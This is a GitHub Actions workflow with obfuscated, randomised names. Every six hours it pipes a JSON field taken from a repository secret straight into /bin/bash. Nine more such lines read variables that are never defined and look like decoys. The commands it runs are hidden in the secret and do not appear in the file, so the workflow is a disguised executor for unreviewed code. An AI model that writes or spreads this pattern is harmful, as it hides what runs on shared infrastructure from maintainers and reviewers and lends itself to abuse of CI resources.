name: yushituoqie

on:
  workflow_dispatch:
  schedule:
    - cron: '13 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yushituoqie
        env:
          wxiou764: ${{ secrets.wxiou764 }}
        run: |
          echo $wxiou764 | jq -r .uir7928 | /bin/bash
          echo $kava80739 | jq -r .g1 | /bin/bash
          echo $igiq88508 | jq -r .rqslb10 | /bin/bash
          echo $ruo2 | jq -r .g11673 | /bin/bash
          echo $udxu2281 | jq -r .j2210 | /bin/bash
          echo $v397 | jq -r .u6 | /bin/bash
          echo $qf4 | jq -r .d0729 | /bin/bash
          echo $ymhfb7 | jq -r .ckawh0395 | /bin/bash
          echo $gb85 | jq -r .ire8 | /bin/bash
          echo $rrera404 | jq -r .ubxgy375 | /bin/bash

